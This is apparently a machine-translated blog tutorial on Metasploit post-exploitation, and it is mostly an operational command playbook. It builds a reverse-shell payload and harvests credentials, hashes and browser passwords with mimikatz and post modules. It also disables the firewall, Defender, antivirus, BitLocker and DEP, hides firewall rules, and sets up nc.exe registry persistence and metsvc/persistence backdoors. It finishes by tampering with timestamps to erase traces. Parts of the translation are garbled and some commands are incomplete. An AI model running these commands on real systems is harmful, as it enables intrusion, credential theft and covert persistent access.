What should I do when I go online Metasploit?

The post penetration stage is to expand the results after gaining control of the target operating system

First, construct a payload

 msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST= LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -f exe -o 1.exe

A machine has been found to execute my payload

Further access to higher permissions.

View basic information

View system information


view user permission


View network environment

run get_local_subnets

View kernel

uname -a

View version

cat /etc/issue

Information collection module

Some commonly used post modules 1. Judge whether the target machine is a virtual machine

 run post/windows/gather/checkvm

2. View the account and token of the target host

 run post/windows/gather/credentials/credential_collector

3. View the installed software of the target machine

 run post/windows/gather/enum_applications

4. Local right lifting test module

If the authority you get is not the administrator's system authority, and you don't know whether there is a vulnerability of local right lifting, you can choose the following modules for testing

run post/multi/recon/local_exploit_suggester

It will automatically walk through all the vulnerabilities that can be tested, and then list the feasible ones.

5. View recently opened files

run post/windows/gather/dumplinks

6. Check the web application account password for Firefox browser login

Suppose that the target system has Firefox installed and the account password is set to be saved in the browser

run post/multi/gather/firefox_creds

7.ssh save account view

 run post/multi/gather/ssh_creds

8. Detect whether a program on the system is malware For example:

 run post/multi/gather/check_malware REMOTEFILE=c:\\a.exe

9. Collect password hash on the system (administrator permission is required)

run post/windows/gather/smart_hashdump

10. View the login user of the target machine

run post/windows/gather/enum_logged_on_users

11. Collect the login credentials of the target machine

run post/windows/gather/credentials/credential_collector

12. View the partition of the target machine

run post/windows/gather/forensics/enum_drives

13. Get browser cache file

run post/windows/gather/enum_ie

Information collection script

The collected target machine information will be downloaded locally

run winneum

run scraper

General operation

For more command operations, please see the article [1]

Get system permission


Get user password hash

The hash value used to obtain the user name and password of the system account


Get machine online time


Target host file search

search command

For example, search all. ini files of the host

 search -f *.ini

Searching the whole computer may take a long time, and observing users may notice that their hard disk is constantly bumpy, so search in the specified directory. For example:

search -d c:\\documents\ and\ settings\\administrator\\desktop\\ -f *.pdf

Mimikatz extension

system permission is required

load mimikatz 

load The new commands are as follows:

These above are related to the account number of the system mimikatz_command -f cannot get help, but it can get the usage method from the error message

View system operation services

mimikatz_command -f service::list

View system processes

 mimikatz_command -f process::list

You can get more command prompts through error reporting

Turn off firewall

Premise: the shell that has obtained the administrator permission of the target host through the vulnerability

Use the following command to turn off the firewall


netsh advfirewall set allprofiles state off

Check it. It is closed successfully

Further end windend

 net stop windefend  //netstop is used to end the windows service

View service status under windows Run services.msc with win+r

Add a firewall policy

First enter the command prompt

execute -f cmd -i -H   //Open the shell in a hidden way

View firewall status

netsh firewall show opmode

Add an allow policy

 netsh firewall add portopening TCP 4444 "test" ENABLE ALL 
  //The name test can be set as a hidden name, which can be extracted from the firewall policy,
  Achieve the purpose of concealment

Kill antivirus software

Under the command of meterpreter, enter

Run killav

You can also use the post module directly

run post/windows/manage/killav

Turn on Remote Desktop Services

 run post/windows/manage/enable_rdp

Use saved scripts

Turn on Remote Desktop Services

 run getgui –e

Add remote desktop user and password

 run getgui -u user -p pass

Grab screen


Or use plug-ins

load espia  //Loading plug-ins
screengrab //Screen capture

Registry operation


For example: We have obtained the permission of the merterpreter of the target host. By modifying the registry, we will run the nc.exe uploaded to the target host every time the target host starts up, so as to facilitate the monitoring of the target host. 1. Upload nc.exe to the target host

 upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32   //Transferred to the system directory

2. Check the contents of the registry that follow the host startup by default

reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run  //reg is a special command in merterpreter to view and modify the registry

3. Add a key value

 reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe'   
 //The setval parameter is to add or modify a key value
 // -The Ldp L parameter is listening, d means in the background, and p means port
 // All in all, the unknown key value is added to the registry. The content is to execute nc.exe in the directory, open cmd.exe in the background, listen to port 444 and wait for connection.

View the successful insertion after successful execution.

You can also use the following command

 reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc
 // queryval is a query

Additional registry options [2]

Disk encryption

Bitlocker disk encryption. The encrypted files of some computers are encrypted and sealed. Bitlocker encryption is one, which is integrated into the windows system software system.

Turn off disk encryption on the target host:

 manage-bde -off C:

To view disk encryption status:

manage-bde -status C:

Close DEP

DEP is a hardware based cpu protection technology. Closing DEPk can easily break the enemy's defense. You can use the following commands

 bcdedit.exe /set {current} nx AlwaysOff

File access time modification

When operating on the target system file, the time of file operation will be left, including creation time, modification time and change time. As the name suggests, the system administrator can use the information of these three times to check whether and when the file has been changed and judge whether the system has been invaded.

For penetration testing, of course, we hope to erase the traces of changes. You can use stat - file name to view the details of the file time.

Timestomp Timestamp is a command used by merterpreter to view and modify the change time of a file. View the specific time of the file

 timestomp -v 1.txt

Compared with stat command, Entry Modified: 2020-07-22 22:51:39 -0400

Change the MAC time of one file to copy according to the MAC time of another file

 timestomp -f c:\\autoexec.bat 1.txt

Time specific modification parameters

 -m  //Modified time
 -a   //Modify Accessed time
 -c  //Modify Created time
 -e  //Modify Entry Modified time
 -z  //Modify all four times

For example:

 timestomp -z "MM/DD/YYYY HH24:MI:SS"  2.txt


Generally, payLoad has advanced parameters, in which there is an advanced advanced option.

You can see that there is an AutoRunScript parameter, which is to execute the script immediately after executing the payload.

For example: set AutoRunScript migrate -n explorer.exe This statement means that once you get the shell, immediately migrate the process to explorer.exe to avoid losing the shell after the injected toxic exe is killed.

Or other scripts, for example, view the most recently opened files on the target host immediately

set AutoRunScript post/windows/gather/dumplinks

If there are two scripts in sequence, you can add a script that executes first in the InitialAutoRunScript option.

Modify hosts file

run hostsedit -e,www.baidu.com

Persistent back door

 run metsvc -A       //   Delete - r

This command will directly generate a system process named metsvc.exe, listening on port 31337 And the boot will start itself, but the disadvantage is that the port cannot be configured by itself, and the name of the uploaded exe file cannot be changed.

Connect the rear door

 set PAYLOAD windows/metsvc_bind_tcp 
 set LPORT 31337 
 set RHOST

I haven't got the shell card for a long time. It's estimated that this module won't be maintained


Check the configuration items of the parameters

-A The default connection method is exploit/multi/handler
-S  Work on the system as a system service process
-X Automatic execution when the system is powered on
-i Delay time, when the service is running n Seconds to perform a loopback
-p port
-r Back connected ip Address, that is kali Address of


 run persistence -X -i 10 -p 4444 -r 
 run persistence -U -i 20 -p 4444 -r 
 run persistence -S -i 20 -p 4444 -r

reference material

[1] General operation details:“ https://blog.csdn.net/Yu_csdnstory/article/details/107441171 "

[2] Additional registry details: https://support.accessdata.com/hc/en-us/articles/204448155-Registry-Quick-Find-Chart

Posted on Fri, 26 Nov 2021 03:50:26 -0500 by forcom